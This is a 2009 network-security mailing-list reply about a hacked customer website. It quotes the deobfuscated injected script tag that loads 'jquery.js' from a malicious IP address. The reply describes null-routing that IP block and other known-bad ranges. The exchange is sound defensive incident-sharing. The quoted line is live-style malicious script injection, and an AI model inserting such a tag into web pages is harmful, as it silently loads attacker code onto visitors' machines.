[nsp-sec] ATTN AS 12553 malware hosting
Brian Eckman
eckman at umn.edu
Thu Apr 9 16:40:45 EDT 2009
Mike Tancsa wrote:
> Of our our customer Windows based websites was hacked (still looking for
> the initial vector)... On their html pages, some obfuscated js code was
> installed that translates to
>
> <script src = //94.247.2.195 / jquery.js> </script>
I realize that not everyone can just do this, but we null routed
94.247.2.0/23 at our exit/border routers a few months back. After a
month or so of intel gathering, the only semi-legit services I could
find there were authoritative DNS servers, and all of the zones I saw
queries for were not what I'd call collateral damage, but more like a
bonus for us...
It's announced within 94.247.0.0/21, but I didn't see anything else
within the /21 that seemed related to all of the badness within that /23.
(To the best of my knowledge, the only other blocks we've ever
implemented, outside of /32s, were 85.255.112.0/21 (DNS hijacking), and
AS40989 (RBN). So we don't just drop any old bad guys we come across....)
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
More information about the nsp-security
mailing list